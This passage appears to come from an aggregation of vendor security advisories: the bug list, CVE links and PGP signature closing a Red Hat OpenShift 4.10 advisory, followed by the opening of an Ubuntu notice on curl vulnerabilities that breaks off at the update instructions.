2037635 - impossible to configure custom certs for default console route in ingress config
2037637 - configure custom certificate for default console route doesn't take effect for OCP >= 4.8
2037638 - Builds do not support CSI volumes as volume sources
2037664 - text formatting issue in Installed Operators list table
2037680 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037689 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037801 - Serverless installation is failing on CI jobs for e2e tests
2037813 - Metal Day 1 Networking - networkConfig Field Only Accepts String Format
2037856 - use lease for leader election
2037891 - 403 Forbidden error shows for all the graphs in each grafana dashboard after upgrade from 4.9 to 4.10
2037903 - Alibaba Cloud: delete-ram-user requires the credentials-requests
2037904 - upgrade operator deployment failed due to memory limit too low for manager container
2038021 - [4.10-Alibaba CSI driver][Default volumesnapshot class is not added/present after successful cluster installation]
2038034 - non-privileged user cannot see auto-update boot source
2038053 - Bump dependencies to k8s 1.23
2038088 - Remove ipa-downloader references
2038160 - The default project missed the annotation : openshift.io/node-selector: ""
2038166 - Starting from Go 1.17 invalid certificates will render a cluster non-functional
2038196 - must-gather is missing collecting some metal3 resources
2038240 - Error when configuring a file using permissions bigger than decimal 511 (octal 0777)
2038253 - Validator Policies are long lived
2038272 - Failures to build a PreprovisioningImage are not reported
2038384 - Azure Default Instance Types are Incorrect
2038389 - Failing test: [sig-arch] events should not repeat pathologically
2038412 - Import page calls the git file list unnecessarily twice from GitHub/GitLab/Bitbucket
2038465 - Upgrade chromedriver to 90.x to support Mac M1 chips
2038481 - kube-controller-manager-guard and openshift-kube-scheduler-guard pods being deleted and restarted on a cordoned node when drained
2038596 - Auto egressIP for OVN cluster on GCP: After egressIP object is deleted, egressIP still takes effect
2038663 - update kubevirt-plugin OWNERS
2038691 - [AUTH-8] Panic on user login when the user belongs to a group in the IdP side and the group already exists via "oc adm groups new"
2038705 - Update ptp reviewers
2038761 - Open Observe->Targets page, wait for a while, page become blank
2038768 - All the filters on the Observe->Targets page can't work
2038772 - Some monitors failed to display on Observe->Targets page
2038793 - [SDN EgressIP] After reboot egress node, the egressip was lost from egress node
2038827 - should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces
2038832 - New templates for centos stream8 are missing registry suggestions in create vm wizard
2038840 - [SDN EgressIP]cloud-network-config-controller pod was CrashLoopBackOff after some operation
2038864 - E2E tests fail because multi-hop-net was not created
2038879 - All Builds are getting listed in DeploymentConfig under workloads on OpenShift Console
2038934 - CSI driver operators should use the trusted CA bundle when cluster proxy is configured
2038968 - Move feature gates from a carry patch to openshift/api
2039056 - Layout issue with breadcrumbs on API explorer page
2039057 - Kind column is not wide enough in API explorer page
2039064 - Bulk Import e2e test flaking at a high rate
2039065 - Diagnose and fix Bulk Import e2e test that was previously disabled
2039085 - Cloud credential operator configuration failing to apply in hypershift/ROKS clusters
2039099 - [OVN EgressIP GCP] After reboot egress node, egressip that was previously assigned got lost
2039109 - [FJ OCP4.10 Bug]: startironic.sh failed to pull the image of image-customization container when behind a proxy
2039119 - CVO hotloops on Service openshift-monitoring/cluster-monitoring-operator
2039170 - [upgrade]Error shown on registry operator "missing the cloud-provider-config configmap" after upgrade
2039227 - Improve image customization server parameter passing during installation
2039241 - Improve image customization server parameter passing during installation
2039244 - Helm Release revision history page crashes the UI
2039294 - SDN controller metrics cannot be consumed correctly by prometheus
2039311 - oc Does Not Describe Build CSI Volumes
2039315 - Helm release list page should only fetch secrets for deployed charts
2039321 - SDN controller metrics are not being consumed by prometheus
2039330 - Create NMState button doesn't work in OperatorHub web console
2039339 - cluster-ingress-operator should report Unupgradeable if user has modified the aws resources annotations
2039345 - CNO does not verify the minimum MTU value for IPv6/dual-stack clusters.
2039359 - oc adm prune deployments can't prune the RS where the associated Deployment no longer exists
2039382 - gather_metallb_logs does not have execution permission
2039406 - logout from rest session after vsphere operator sync is finished
2039408 - Add GCP region northamerica-northeast2 to allowed regions
2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration
2039425 - No need to set KlusterletAddonConfig CR applicationManager->enabled: true in RAN ztp deployment
2039491 - oc - git:// protocol used in unit tests
2039516 - Bump OVN to ovn21.12-21.12.0-25
2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate
2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled
2039541 - Resolv-prepender script duplicating entries
2039586 - [e2e] update centos8 to centos stream8
2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty
2039619 - [AWS] In tree provisioner storageclass aws disk type should contain 'gp3' and csi provisioner storageclass default aws disk type should be 'gp3'
2039670 - Create PDBs for control plane components
2039678 - Page goes blank when create image pull secret
2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported
2039743 - React missing key warning when open operator hub detail page (and maybe others as well)
2039756 - React missing key warning when open KnativeServing details
2039770 - Observe dashboard doesn't react on time-range changes after browser reload when perspective is changed in another tab
2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard
2039781 - [GSS] OBC is not visible by admin of a Project on Console
2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector
2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled
2039880 - Log level too low for control plane metrics
2039919 - Add E2E test for router compression feature
2039981 - ZTP for standard clusters installs stalld on master nodes
2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. You can use --secure-port instead
2040136 - external-dns-operator pod keeps restarting and reports error: timed out waiting for cache to be synced
2040143 - [IPI on Alibabacloud] suggest to remove region "cn-nanjing" or provide better error message
2040150 - Update ConfigMap keys for IBM HPCS
2040160 - [IPI on Alibabacloud] installation fails when region does not support pay-by-bandwidth
2040285 - Bump build-machinery-go for console-operator to pickup change in yaml-patch repository
2040357 - bump OVN to ovn-2021-21.12.0-11.el8fdp
2040376 - "unknown instance type" error for supported m6i.xlarge instance
2040394 - Controller: enqueue the failed configmap till services update
2040467 - Cannot build ztp-site-generator container image
2040504 - Change AWS EBS GP3 IOPS in MachineSet doesn't take affect in OpenShift 4
2040521 - RouterCertsDegraded certificate could not validate route hostname v4-0-config-system-custom-router-certs.apps
2040535 - Auto-update boot source is not available in customize wizard
2040540 - ovs hardware offload: ovsargs format error when adding vf netdev name
2040603 - rhel worker scaleup playbook failed because missing some dependency of podman
2040616 - rolebindings page doesn't load for normal users
2040620 - [MAPO] Error pulling MAPO image on installation
2040653 - Topology sidebar warns that another component is updated while rendering
2040655 - User settings update fails when selecting application in topology sidebar
2040661 - Different react warnings about updating state on unmounted components when leaving topology
2040670 - Permafailing CI job: periodic-ci-openshift-release-master-nightly-4.10-e2e-gcp-libvirt-cert-rotation
2040671 - [Feature:IPv6DualStack] most tests are failing in dualstack ipi
2040694 - Three upstream HTTPClientConfig struct fields missing in the operator
2040705 - Du policy for standard cluster runs the PTP daemon on masters and workers
2040710 - cluster-baremetal-operator cannot update BMC subscription CR
2040741 - Add CI test(s) to ensure that metal3 components are deployed in vSphere, OpenStack and None platforms
2040782 - Import YAML page blocks input with more then one generateName attribute
2040783 - The Import from YAML summary page doesn't show the resource name if created via generateName attribute
2040791 - Default PGT policies must be 'inform' to integrate with the Lifecycle Operator
2040793 - Fix snapshot e2e failures
2040880 - do not block upgrades if we can't connect to vcenter
2041087 - MetalLB: MetalLB CR is not upgraded automatically from 4.9 to 4.10
2041093 - autounattend.xml missing
2041204 - link to templates in virtualization-cluster-overview inventory card is to all templates
2041319 - [IPI on Alibabacloud] installation in region "cn-shanghai" failed, due to "Resource alicloud_vswitch CreateVSwitch Failed...InvalidCidrBlock.Overlapped"
2041326 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.23
2041329 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cloud-network-config-controller
2041361 - [IPI on Alibabacloud] Disable session persistence and removebBandwidth peak of listener
2041441 - Provision volume with size 3000Gi even if sizeRange: '[10-2000]GiB' in storageclass on IBM cloud
2041466 - Kubedescheduler version is missing from the operator logs
2041475 - React components should have a (mostly) unique name in react dev tools to simplify code analyses
2041483 - MetallB: quay.io/openshift/origin-kube-rbac-proxy:4.10 deploy Metallb CR is missing (controller and speaker pods)
2041492 - Spacing between resources in inventory card is too small
2041509 - GCP Cloud provider components should use K8s 1.23 dependencies
2041510 - cluster-baremetal-operator doesn't run baremetal-operator's subscription webhook
2041541 - audit: ManagedFields are dropped using API not annotation
2041546 - ovnkube: set election timer at RAFT cluster creation time
2041554 - use lease for leader election
2041581 - KubeDescheduler operator log shows "Use of insecure cipher detected"
2041583 - etcd and api server cpu mask interferes with a guaranteed workload
2041598 - Including CA bundle in Azure Stack cloud config causes MCO failure
2041605 - Dynamic Plugins: discrepancy in proxy alias documentation/implementation
2041620 - bundle CSV alm-examples does not parse
2041641 - Fix inotify leak and kubelet retaining memory
2041671 - Delete templates leads to 404 page
2041694 - [IPI on Alibabacloud] installation fails when region does not support the cloud_essd disk category
2041734 - ovs hwol: VFs are unbind when switchdev mode is enabled
2041750 - [IPI on Alibabacloud] trying "create install-config" with region "cn-wulanchabu (China (Ulanqab))" (or "ap-southeast-6 (Philippines (Manila))", "cn-guangzhou (China (Guangzhou))") failed due to invalid endpoint
2041763 - The Observe > Alerting pages no longer have their default sort order applied
2041830 - CI: ovn-kubernetes-master-e2e-aws-ovn-windows is broken
2041854 - Communities / Local prefs are applied to all the services regardless of the pool, and only one community is applied
2041882 - cloud-network-config operator can't work normal on GCP workload identity cluster
2041888 - Intermittent incorrect build to run correlation, leading to run status updates applied to wrong build, builds stuck in non-terminal phases
2041926 - [IPI on Alibabacloud] Installer ignores public zone when it does not exist
2041971 - [vsphere] Reconciliation of mutating webhooks didn't happen
2041989 - CredentialsRequest manifests being installed for ibm-cloud-managed profile
2041999 - [PROXY] external dns pod cannot recognize custom proxy CA
2042001 - unexpectedly found multiple load balancers
2042029 - kubedescheduler fails to install completely
2042036 - [IBMCLOUD] "openshift-install explain installconfig.platform.ibmcloud" contains not yet supported custom vpc parameters
2042049 - Seeing warning related to unrecognized feature gate in kubescheduler & KCM logs
2042059 - update discovery burst to reflect lots of CRDs on openshift clusters
2042069 - Revert toolbox to rhcos-toolbox
2042169 - Can not delete egressnetworkpolicy in Foreground propagation
2042181 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2042265 - [IBM]"--scale-down-utilization-threshold" doesn't work on IBMCloud
2042274 - Storage API should be used when creating a PVC
2042315 - Baremetal IPI deployment with IPv6 control plane and disabled provisioning network fails as the nodes do not pass introspection
2042366 - Lifecycle hooks should be independently managed
2042370 - [IPI on Alibabacloud] installer panics when the zone does not have an enhanced NAT gateway
2042382 - [e2e][automation] CI takes more then 2 hours to run
2042395 - Add prerequisites for active health checks test
2042438 - Missing rpms in openstack-installer image
2042466 - Selection does not happen when switching from Topology Graph to List View
2042493 - No way to verify if IPs with leading zeros are still valid in the apiserver
2042567 - insufficient info on CodeReady Containers configuration
2042600 - Alone, the io.kubernetes.cri-o.Devices option poses a security risk
2042619 - Overview page of the console is broken for hypershift clusters
2042655 - [IPI on Alibabacloud] cluster becomes unusable if there is only one kube-apiserver pod running
2042711 - [IBMCloud] Machine Deletion Hook cannot work on IBMCloud
2042715 - [AliCloud] Machine Deletion Hook cannot work on AliCloud
2042770 - [IPI on Alibabacloud] with vpcID & vswitchIDs specified, the installer would still try creating NAT gateway unexpectedly
2042829 - Topology performance: HPA was fetched for each Deployment (Pod Ring)
2042851 - Create template from SAP HANA template flow - VM is created instead of a new template
2042906 - Edit machineset with same machine deletion hook name succeed
2042960 - azure-file CI fails with "gid(0) in storageClass and pod fsgroup(1000) are not equal"
2043003 - [IPI on Alibabacloud] 'destroy cluster' of a failed installation (bug2041694) stuck after 'stage=Nat gateways'
2043042 - [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2043043 - Cluster Autoscaler should use K8s 1.23 dependencies
2043064 - Topology performance: Unnecessary rerenderings in topology nodes (unchanged mobx props)
2043078 - Favorite system projects not visible in the project selector after toggling "Show default projects".
2043117 - Recommended operators links are erroneously treated as external
2043130 - Update CSI sidecars to the latest release for 4.10
2043234 - Missing validation when creating several BGPPeers with the same peerAddress
2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler
2043254 - crio does not bind the security profiles directory
2043296 - Ignition fails when reusing existing statically-keyed LUKS volume
2043297 - [4.10] Bootimage bump tracker
2043316 - RHCOS VM fails to boot on Nutanix AOS
2043446 - Rebase aws-efs-utils to the latest upstream version.
2043556 - Add proper ci-operator configuration to ironic and ironic-agent images
2043577 - DPU network operator
2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator
2043675 - Too many machines deleted by cluster autoscaler when scaling down
2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation
2043709 - Logging flags no longer being bound to command line
2043721 - Installer bootstrap hosts using outdated kubelet containing bugs
2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather
2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23
2043780 - Bump router to k8s.io/api 1.23
2043787 - Bump cluster-dns-operator to k8s.io/api 1.23
2043801 - Bump CoreDNS to k8s.io/api 1.23
2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown
2043961 - [OVN-K] If pod creation fails, retry doesn't work as expected.
2044201 - Templates golden image parameters names should be supported
2044244 - Builds are failing after upgrading the cluster with builder image [jboss-webserver-5/jws56-openjdk8-openshift-rhel8]
2044248 - [IBMCloud][vpc.block.csi.ibm.io]Cluster common user use the storageclass without parameter “csi.storage.k8s.io/fstype” create pvc,pod successfully but write data to the pod's volume failed of "Permission denied"
2044303 - [ovn][cloud-network-config-controller] cloudprivateipconfigs ips were left after deleting egressip objects
2044347 - Bump to kubernetes 1.23.3
2044481 - collect sharedresource cluster scoped instances with must-gather
2044496 - Unable to create hardware events subscription - failed to add finalizers
2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources
2044680 - Additional libovsdb performance and resource consumption fixes
2044704 - Observe > Alerting pages should not show runbook links in 4.10
2044717 - [e2e] improve tests for upstream test environment
2044724 - Remove namespace column on VM list page when a project is selected
2044745 - Upgrading cluster from 4.9 to 4.10 on Azure (ARO) causes the cloud-network-config-controller pod to CrashLoopBackOff
2044808 - machine-config-daemon-pull.service: use cp instead of cat when extracting MCD in OKD
2045024 - CustomNoUpgrade alerts should be ignored
2045112 - vsphere-problem-detector has missing rbac rules for leases
2045199 - SnapShot with Disk Hot-plug hangs
2045561 - Cluster Autoscaler should use the same default Group value as Cluster API
2045591 - Reconciliation of aws pod identity mutating webhook did not happen
2045849 - Add Sprint 212 translations
2045866 - MCO Operator pod spam "Error creating event" warning messages in 4.10
2045878 - Sync upstream 1.16.0 downstream; includes hybrid helm plugin
2045916 - [IBMCloud] Default machine profile in installer is unreliable
2045927 - [FJ OCP4.10 Bug]: Podman failed to pull the IPA image due to the loss of proxy environment
2046025 - [IPI on Alibabacloud] pre-configured alicloud DNS private zone is deleted after destroying cluster, please clarify
2046137 - oc output for unknown commands is not human readable
2046296 - When creating multiple consecutive egressIPs on GCP not all of them get assigned to the instance
2046297 - Bump DB reconnect timeout
2046517 - In Notification drawer, the "Recommendations" header shows when there isn't any recommendations
2046597 - Observe > Targets page may show the wrong service monitor is multiple monitors have the same namespace & label selectors
2046626 - Allow setting custom metrics for Ansible-based Operators
2046683 - [AliCloud]"--scale-down-utilization-threshold" doesn't work on AliCloud
2047025 - Installation fails because of Alibaba CSI driver operator is degraded
2047190 - Bump Alibaba CSI driver for 4.10
2047238 - When using communities and localpreferences together, only localpreference gets applied
2047255 - alibaba: resourceGroupID not found
2047258 - [aws-usgov] fatal error occurred if AMI is not provided for AWS GovCloud regions
2047317 - Update HELM OWNERS files under Dev Console
2047455 - [IBM Cloud] Update custom image os type
2047496 - Add image digest feature
2047779 - do not degrade cluster if storagepolicy creation fails
2047927 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2047929 - use lease for leader election
2047975 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2048046 - New route annotation to show another URL or hide topology URL decorator doesn't work for Knative Services
2048048 - Application tab in User Preferences dropdown menus are too wide.
2048050 - Topology list view items are not highlighted on keyboard navigation
2048117 - [IBM]Shouldn't change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value
2048413 - Bond CNI: Failed to attach Bond NAD to pod
2048443 - Image registry operator panics when finalizes config deletion
2048478 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*
2048484 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt
2048598 - Web terminal view is broken
2048836 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure
2048891 - Topology page is crashed
2049003 - 4.10: [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class
2049043 - Cannot create VM from template
2049156 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2049886 - Placeholder bug for OCP 4.10.0 metadata release
2049890 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning
2050189 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2
2050190 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0
2050227 - Installation on PSI fails with: 'openstack platform does not have the required standard-attr-tag network extension'
2050247 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]
2050250 - Install fails to bootstrap, complaining about DefragControllerDegraded and sad members
2050310 - ContainerCreateError when trying to launch large (>500) numbers of pods across nodes
2050370 - alert data for burn budget needs to be updated to prevent regression
2050393 - ZTP missing support for local image registry and custom machine config
2050557 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud
2050737 - Remove metrics and events for master port offsets
2050801 - Vsphere upi tries to access vsphere during manifests generation phase
2050883 - Logger object in LSO does not log source location accurately
2051692 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit
2052062 - Whereabouts should implement client-go 1.22+
2052125 - [4.10] Crio appears to be coredumping in some scenarios
2052210 - [aws-c2s] kube-apiserver crashloops due to missing cloud config
2052339 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade.
2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052598 - kube-scheduler should use configmap lease
2052599 - kube-controller-manger should use configmap lease
2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics vsphere_rwx_volumes_total not valid
2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set.
2052644 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1
2052666 - [4.10.z] change gitmodules to rhcos-4.10 branch
2052756 - [4.10] PVs are not being cleaned up after PVC deletion
2053175 - oc adm catalog mirror throws 'missing signature key' error when using file://local/index
2053218 - ImagePull fails with error "unable to pull manifest from example.com/busy.box:v5 invalid reference format"
2053252 - Sidepanel for Connectors/workloads in topology shows invalid tabs
2053268 - inability to detect static lifecycle failure
2053314 - requestheader IDP test doesn't wait for cleanup, causing high failure rates
2053323 - OpenShift-Ansible BYOH Unit Tests are Broken
2053339 - Remove dev preview badge from IBM FlashSystem deployment windows
2053751 - ztp-site-generate container is missing convenience entrypoint
2053945 - [4.10] Failed to apply sriov policy on intel nics
2054109 - Missing "app" label
2054154 - RoleBinding in project without subject is causing "Project access" page to fail
2054244 - Latest pipeline run should be listed on the top of the pipeline run list
2054288 - console-master-e2e-gcp-console is broken
2054562 - DPU network operator 4.10 branch need to sync with master
2054897 - Unable to deploy hw-event-proxy operator
2055193 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently
2055358 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line
2055371 - Remove Check which enforces summary_interval must match logSyncInterval
2055689 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11
2055894 - CCO mint mode will not work for Azure after sunsetting of Active Directory Graph API
2056441 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured
2056479 - ovirt-csi-driver-node pods are crashing intermittently
2056572 - reconcilePrecaching error: cannot list resource "clusterserviceversions" in API group "operators.coreos.com" at the cluster scope"
2056629 - [4.10] EFS CSI driver can't unmount volumes with "wait: no child processes"
2056878 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs
2056928 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation
2056948 - post 1.23 rebase: regression in service-load balancer reliability
2057438 - Service Level Agreement (SLA) always show 'Unknown'
2057721 - Fix Proxy support in RHACM 2.4.2
2057724 - Image creation fails when NMstateConfig CR is empty
2058641 - [4.10] Pod density test causing problems when using kube-burner
2059761 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install
2060610 - Broken access to public images: Unable to connect to the server: no basic auth credentials
2060956 - service domain can't be resolved when networkpolicy is used in OCP 4.10-rc
- References:
https://access.redhat.com/security/cve/CVE-2014-3577 https://access.redhat.com/security/cve/CVE-2016-10228 https://access.redhat.com/security/cve/CVE-2017-14502 https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2018-1000858 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-9169 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-25013 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-8927 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-9952 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-13434 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-15358 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-25660 https://access.redhat.com/security/cve/CVE-2020-25677 https://access.redhat.com/security/cve/CVE-2020-27618 https://access.redhat.com/security/cve/CVE-2020-27781 https://access.redhat.com/security/cve/CVE-2020-29361 https://access.redhat.com/security/cve/CVE-2020-29362 https://access.redhat.com/security/cve/CVE-2020-29363 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/cve/CVE-2021-3326 https://access.redhat.com/security/cve/CVE-2021-3449 https://access.redhat.com/security/cve/CVE-2021-3450 https://access.redhat.com/security/cve/CVE-2021-3516 https://access.redhat.com/security/cve/CVE-2021-3517 https://access.redhat.com/security/cve/CVE-2021-3518 https://access.redhat.com/security/cve/CVE-2021-3520 https://access.redhat.com/security/cve/CVE-2021-3521 https://access.redhat.com/security/cve/CVE-2021-3537 https://access.redhat.com/security/cve/CVE-2021-3541 https://access.redhat.com/security/cve/CVE-2021-3733 https://access.redhat.com/security/cve/CVE-2021-3749 https://access.redhat.com/security/cve/CVE-2021-20305 https://access.redhat.com/security/cve/CVE-2021-21684 https://access.redhat.com/security/cve/CVE-2021-22946 https://access.redhat.com/security/cve/CVE-2021-22947 https://access.redhat.com/security/cve/CVE-2021-25215 https://access.redhat.com/security/cve/CVE-2021-27218 https://access.redhat.com/security/cve/CVE-2021-30666 https://access.redhat.com/security/cve/CVE-2021-30761 https://access.redhat.com/security/cve/CVE-2021-30762 https://access.redhat.com/security/cve/CVE-2021-33928 https://access.redhat.com/security/cve/CVE-2021-33929 https://access.redhat.com/security/cve/CVE-2021-33930 https://access.redhat.com/security/cve/CVE-2021-33938 https://access.redhat.com/security/cve/CVE-2021-36222 https://access.redhat.com/security/cve/CVE-2021-37750 https://access.redhat.com/security/cve/CVE-2021-39226 https://access.redhat.com/security/cve/CVE-2021-41190 https://access.redhat.com/security/cve/CVE-2021-43813 https://access.redhat.com/security/cve/CVE-2021-44716 https://access.redhat.com/security/cve/CVE-2021-44717 https://access.redhat.com/security/cve/CVE-2022-0532 https://access.redhat.com/security/cve/CVE-2022-21673 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYipqONzjgjWX9erEAQjQcBAAgWTjA6Q2NgqfVf63ZpJF1jPurZLPqxDL 0in/5+/wqWaiQ6yk7wM3YBZgviyKnAMCVdrLsaR7R77BvfJcTE3W/fzogxpp6Rne eGT1PTgQRecrSIn+WG4gGSteavTULWOIoPvUiNpiy3Y7fFgjFdah+Nyx3Xd+xehM CEswylOd6Hr03KZ1tS3XL3kGL2botha48Yls7FzDFbNcy6TBAuycmQZifKu8mHaF aDAupVJinDnnVgACeS6CnZTAD+Vrx5W7NIisteXv4x5Hy+jBIUHr8Yge3oxYoFnC Y/XmuOw2KilLZuqFe+KHig45qT+FmNU8E1egcGpNWvmS8hGZfiG1jEQAqDPbZHxp sQAQZLQyz3TvXa29vp4QcsUuMxndIOi+QaK75JmqE06MqMIlFDYpr6eQOIgIZvFO RDZU/qvBjh56ypInoqInBf8KOQMy6eO+r6nFbMGcAfucXmz0EVcSP1oFHAoA1nWN rs1Qz/SO4CvdPERxcr1MLuBLggZ6iqGmHKk5IN0SwcndBHaVJ3j/LBv9m7wBYVry bSvojBDYx5ricbTwB5sGzu7oH5yVl813FA9cjkFpEhBiMtTfI+DKC8ssoRYNHd5Z 7gLW6KWPUIDuCIiiioPZAJMyvJ0IMrNDoQ0lhqPeV7PFdlRhT95M/DagUZOpPVuT b5PUYUBIZLc= =GUDA -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-5079-1 September 15, 2021
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in curl.
Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries
Details:
It was discovered that curl incorrect handled memory when sending data to an MQTT server. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2021-22945)
Patrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946)
Patrick Monnerat discovered that curl incorrectly handled responses received before STARTTLS. A remote attacker could possibly use this issue to inject responses and intercept communications. (CVE-2021-22947)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
